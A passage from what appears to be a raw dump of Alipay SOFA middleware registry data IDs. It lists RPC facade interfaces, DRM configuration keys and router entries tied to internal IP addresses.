assetcore.facade.CommonAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.overseapcard.api.OSPCardtransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.GroupQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.contacts.ContactsManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpa.common.service.deduct.MpaDeductService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelRiskMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.205.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_1200_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paymentmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.11.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.217.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.service.facade.service.api.TriggerTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_172.17.97.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-mrmcore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_192.168.1.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.facade.partner.PartnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.repay.OffRepayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.faq.FaqRepositoryManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necquery.common.service.drawndn.DrawndnInfoQueryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instsign.common.service.facade.account.ArAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.cif.facade.ProxyMobileQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.codec.CodecDecodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksigncentre_contractSealFailCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.tree.BboxTreeOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimitnear:name=com.alipay.rule.core.repository.drm.RepositoryConfigResource.scriptGreyFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mediafeature.facade.api.MediaFeatureService:1.0:mediafeature@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinOutfluxDepositbackHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdAccountQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.InvoiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.settling.common.service.facade.ZmmccoreOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.238.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpdcore:name=com.alipay.fc.prodquery.common.service.ldc.drm.PdcoreZoneRouteConfigDRM.zoneRoute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbadvert.common.service.facade.api.AdvertDiscountBatchQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.publishing.common.facade.filter.PublishFilterApi:1.0:dppublishing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:pointmngTaskCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.detect.EcoSysConfigInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloandecision.service.facade.agds.CreditOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.ClassifyProductCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.discount.DiscountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.188.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:openmonitor_devicemtn_accountFront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.170.243#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.common.TranslationServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestprod.common.service.facade.api.CheckModelGenerateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:chairmosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mnotify.common.service.facade.NotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.infosec.content.service.facade.CompleteDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tradecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.170.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fininfo:name=com.alipay.supergwlite.components.umessage.UniMsgConfigResource.openXStreamWhiteListFunction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.biz.manager.mng.BankAccountManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.rdfgray.InterestConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.backend.BackendManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.switcher.customerv2.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.64.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.125.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundmng.core.service.contract.partnerp2p.InterestPayConfirmService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuprod.biz.service.gw.common.api.SettingManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.topic.isCloseTopicDetailsQueryWithComments,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcheck.common.service.facade.api.RuleConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openaccess.facade.service.access.LogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_1200#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipayplus.gmp.openplatform.facade.PackageServiceFacade:1.0:gmp-openplatform-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.ReduceRuleFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.zy.FaAssetZyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmDownGradeResourceTrigger.channelRouteUserIdWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publictest.facade.task.TaskBatchDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.sandboxdb_ds.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_DISSEMINATION#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cif:name=com.alipay.cif.client.drm.StaticResourceReportConfigSwitch.enabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.30.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.188.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:hbase_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.AssetInstructionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finsupport.component.serial.drm.ZdalUpgradeSwitchDrm.sequenceMigrateSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergwext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.tsd.TsdDingTalkMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zskynet.facade.spi.BizSolutionQueryFacade:1.0:sdchecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gauss.recmng.common.service.facade.api.RuleManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.CopywritingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.facade.fund.api.RecoveryAccBalanceCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.19.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientLineageDRM.lineageRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.120.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbconfigcenter.common.service.facade.api.SubscriberManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.gfas.gfasShardingDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:luoshutwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publiccore.common.service.facade.app.PublicAppUpgradeLifeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.recruit.extension.service.facade.api.ItemExtensionAttributeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.ProcessInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.intimateParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.199.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.125.155#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pfunddts.common.facade.spi.RobotCallBackSPI:1.0:pcreditsentry@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfbrmp.facade.GfbrmpBillTypeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.memberVoucherPublishRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkpromocore.common.manage.facade.CampQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:bkopermng_test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmhatcher.common.service.facade.borrow.voucher.api.BorrowVoucherWriteOffInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterPortalUserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.appraise.EcoFlowAppraiseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_benefitTemplateCancelCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:gzmsact-prempromo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.samefullMethodNames,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finquotationcenter.common.service.facade.api.CandlestickHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:vouchercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundmng.biz.settlement.facade.InstructionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.merchant.EbppInstAuthConfQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tsquare@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_VENUESP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilityprod.common.service.facade.plugin.RiskAuditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.DeliverManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:kbticketcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:sdaxconnectplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianapi.client.SystemExterfaceInvokeService:1.0:insrenewprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.core.control.service.SubBudgetControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplatform.common.service.facade.api.MerchantDiagnosisQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.paramcore.common.service.manage.facade.api.ParmMntListConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_S_RATECENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.queryMifStoresMaxLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmmemberop.common.service.facade.api.CreditPotentialQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.certifymng.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtrade.common.service.facade.api.FundDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yfdwebTBaseCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.148.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.personalprod.service.facade.remind.RemindQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcore.service.tag.PcreditMarkAccountChangeInformTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterDecisionValueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbfeaturecenter.common.service.facade.FeatureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:bkrop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.koa-patch:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbpunish.common.service.facade.punish.api.PunishInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ipsponsorprod.biz.promo.service.GoodsDetailInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityservice.facade.recommender.ServicConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.merchant.MerchantMetadataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.252.107#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.emc.common.service.facade.api.EmcRiskEventManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.ProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iuserdmp.common.service.facade.api.IuserAmountDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baymax.schedule.test.BaymaxTaskScheduleManualTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.core.service.drm.RateGenerateTaskDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:arater@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.inner.InnerRiskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_UTP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iaassettrans.facade.iaasset.api.IaAssetAccountingConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmoaprod.common.facade.service.MrRefundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.arks:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@bstsolprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","NS_Pub_Servers_TP_C_BACK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitydata.common.service.facade.cloud.SecurityCloudDataStoreService:1.0:securitydataproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmembercore.common.facade.MemberProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SystemParameterQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementRzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_M_DEDUCT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finsnsbff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.userResolverTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_support_oneStopDevOpsGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fiscore.common.service.facade.api.CreditDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.minCustomAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.interactiondraw.InteractionDrawMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.20.142.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.promoguard.common.service.facade.inspection.api.PcTaskOperationRecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.iriskmerchant.common.service.facade.merchant.MerchantCommonTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.MiniProgramsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.178.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.prodquery.common.service.api.ContractVOQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_FINSUPPORT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbservcore.common.service.facade.kbjob.KbJobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.rechargeplus.ProductPlusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.39.191.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.148.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:goldenEyeApprovalCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.CommonBatchDetailTestService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.ipay.imerchprod.module.merchant.facade.api.migrate.MigrateEntityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.yunfengdieweb:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.echox.drm.EchoRecordConfigDrm.recordConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","ismonitor@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.imatchfacade.encourage.service.DeliveryConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:lifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.scence.SceneOpenRecordManageGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.246.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasecore.service.v2.question.structured.facade.RouteMapService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.tradepush.OrderPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.common.service.facade.graph.HospitalMergeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.api.AssetTransTwoPhaseManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditbenefit.facade.api.item.BFPromoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:kbadvert@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_OFFLINE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minicenter.common.service.facade.api.bundle.BundleOpenInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.ConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.208.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromoprod.common.service.facade.campaign.mng.PrizeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrdermngDegradeDRM.noStrictMatchProducts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acdoccore.common.service.facade.category.CategoryVideoFrameListFacade#@#DEFAULT_INSTANCE_ID#@#DEF